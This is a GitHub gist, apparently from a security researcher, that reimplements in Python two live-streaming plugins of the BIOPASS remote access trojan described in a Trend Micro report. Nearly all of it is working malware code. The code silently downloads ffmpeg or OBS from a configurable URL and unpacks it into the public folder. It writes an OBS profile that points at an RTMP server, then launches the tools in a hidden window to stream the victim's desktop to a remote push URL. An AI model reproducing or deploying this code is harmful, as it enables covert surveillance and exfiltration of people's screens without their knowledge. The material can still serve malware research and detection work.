Last active
July 15, 2021 10:56
-
-
Save Und3rf10w/d02b134c9f5aa3401e76db825aa8f941 to your computer and use it in GitHub Desktop.
Implementation of plugins.Open_Obs_live and plugins.OpenFFmpegLive from BIOPASS RAT as seen in: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: @Und3rf10w | |
# See: https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html | |
# You'd still have to set up the client config and define certain parameters. Leaving this neutered as is for now | |
import json | |
import win32com.client | |
import win32con, win32gui, win32print | |
import win32api | |
import os | |
import traceback | |
import zipfile | |
import requests | |
import time | |
# TODO: | |
# - Setup client.parameters['Bitrate','FPS',rtmp_key','rtmp_server','download_url', 'push_url'] | |
def Common_shell_exec_A(commands="", runpath=""): | |
try: | |
if runpath == "": | |
runpath = os.getenv('temp') | |
# Common_xlog("shell_exec_A:" + commands + " path:"+runpath) | |
win32api.ShellExecute(0, 'open', 'cmd.exe', f"/c {commands}", runpath, 0) | |
except: | |
# Common_xlog('shell_exec_a Error:' + traceback.format_exc()) | |
return {'status': False, 'result': traceback.format_exc()} # Added for debug | |
def Common_download_file(download_url, download_path): | |
try: | |
download_response = requests.get(download_url) | |
download_response.raise_for_status() | |
destination_file = open(download_path, 'wb') | |
for chunk in download_response.iter_content(100000): | |
destination_file.write(chunk) | |
destination_file.close() | |
return {'status': True, 'result': 'Download file success'} | |
except: | |
return {'status': False, 'result': traceback.format_exc()} | |
class Decompress_file: | |
def __init__(self, parameters): | |
self.parameters = parameters | |
self.result = {'status': False, 'result': 'No Result'} | |
def execute(self): | |
try: | |
zip_location = zipfile.ZipFile(self.parameters['zip_src'], 'r') | |
for zipped_file in zip_location.namelist(): | |
zip_location.extract(zipped_file, self.parameters['dst_dir']) | |
self.result = {'status': True, 'result': 'success'} | |
except: | |
self.result = {'status': False, 'result': traceback.format_exc()} | |
class Close_FfmpegLive: | |
def __init__(self, parameters): | |
self.parameters = parameters | |
self.result = {'status':False, 'result': 'No Result'} | |
def execute(self): | |
try: | |
command = Common_shell_exec_A('TASKKILL /F /IM ffmpeg.exe') | |
time.sleep(1) | |
self.result = {'status': True, 'result': str(command)} | |
except: | |
self.result = {'status': True, 'result': traceback.format_exc()} | |
class Open_FfmpegLive: | |
def __init__(self, parameters): | |
self.parameters = parameters | |
self.result = {'status': False, 'result': 'No Result'} | |
def execute(self): | |
try: | |
ffmpeg_path = os.path.join(os.getenv('public'), 'ffmpeg.exe') | |
if not os.path.exists(ffmpeg_path): | |
ffmpeg_zip_path = os.path.join(os.getenv('public'), 'ffmpeg.zip') | |
Common_download_file(self.parameters['download_url'], ffmpeg_zip_path) | |
decompress_ffmpeg=Decompress_file({'zip_src': ffmpeg_zip_path, 'dst_dir': os.getenv('public')}) | |
decompress_ffmpeg.execute() | |
try: | |
os.remove(ffmpeg_zip_path) | |
except: | |
pass | |
command = win32api.ShellExecute(0, 'open', ffmpeg_path, f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}", os.getenv('public'), 0) | |
# Common_xlog('args:' + f" -f gdigrab -i desktop -draw_mouse 0 -pix_fmt yuv420p -vcodec libx264 -r 5 -b:v 1024k -bufsize 1024k -f flv {self.parameters['push_url']}") | |
# Common_xlog('ffresult:'+str (command)) | |
self.result = {'status': True, 'result': 'Start live broadcast success'} | |
except: | |
self.result = {'status': False, 'result': traceback.format_exc()} | |
class Close_Obs_Live: | |
def __init__(self, parameters): | |
self.parameters = parameters | |
self.result = {'status':False, 'result': 'No Result'} | |
def execute(self): | |
try: | |
Common_shell_exec_A('TASKKILL /F /IM obs64.exe') | |
time.sleep(1) | |
self.result = {'status': True, 'result': 'Close OBS Success'} | |
except: | |
self.result = {'status': True, 'result': traceback.format_exc()} | |
class Open_Obs_live: | |
def __init__(self, client_parameters): | |
self.result = {'status': False, 'result': 'No Result'} | |
self.parameters = client_parameters | |
self.basic_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles', | |
'abcd', 'basic.ini') | |
self.rtmp_config_path = os.path.join(os.getenv('public'), 'obs', 'config', 'obs-studio', 'basic', 'profiles', | |
'abcd', 'service.json') | |
win32_device_capabilities = win32gui.GetDC(int(self.parameters['MonitorID'])) | |
self.width = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPHORZRES) | |
self.height = win32print.GetDeviceCaps(win32_device_capabilities, win32con.DESKTOPVERTZRES) | |
self.obs_dir = os.path.join(os.getenv('public'), 'OBS', 'bin', '64bit') | |
self.obs_bin_name = 'obs64.exe' | |
self.obs_path = os.path.join(self.obs_dir, self.obs_bin_name) | |
if not os.path.exists(self.obs_path) or not os.path.exists(self.basic_config_path): | |
local_obs_zip_path = os.path.join(os.getenv('public'), 'obs.zip') | |
Common_download_file(self.parameters['download_url'], local_obs_zip_path) # download from $0 to $1 | |
unzip_obs = Decompress_file({'zip_src': local_obs_zip_path, 'dst_dir': os.getenv('public')}) | |
unzip_obs.execute() | |
try: | |
os.remove(local_obs_zip_path) | |
except: | |
pass | |
def config(self): | |
try: | |
obs_config = f'''[General] | |
Name=abcd | |
[Video] | |
BaseCX={self.width} | |
BaseCy={self.height} | |
OutputCX={self.width} | |
OutputCY={self.height} | |
FPSType=0 | |
FPSCommon={self.parameters['FPS']} | |
[Panels] | |
CookieId=A35038958F3C987F | |
[SimpleOutput] | |
VBitrate={self.parameters['Bitrate']} | |
StreamEncoder=x264 | |
RecQuality=Stream | |
[Output] | |
Mode=Simple | |
''' | |
rtmp_config = { | |
"settings": {"bwtest": False, "key": self.parameters['rtmp_key'], "server": self.parameters['rtmp_server'], | |
"use_auth": False}, "type": "rtmp_custom"} | |
with open(self.basic_config_path, 'w') as f: | |
f.write(obs_config) | |
f.close() | |
with open(self.rtmp_config_path, 'w') as f: | |
f.write(json.dumps(rtmp_config, sort_keys=True, indent=4)) | |
except: | |
self.result = {'status': False, 'result': traceback.format_exc()} | |
def execute(self): | |
try: | |
self.config() | |
Common_shell_exec_A(self.obs_path + " -p", self.obs_dir) # -p = "Use portable mode" | |
self.result = {'status': True, 'result': 'Open OBS Live Success'} | |
except: | |
self.result = {'status': False, 'result': traceback.format_exc()} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment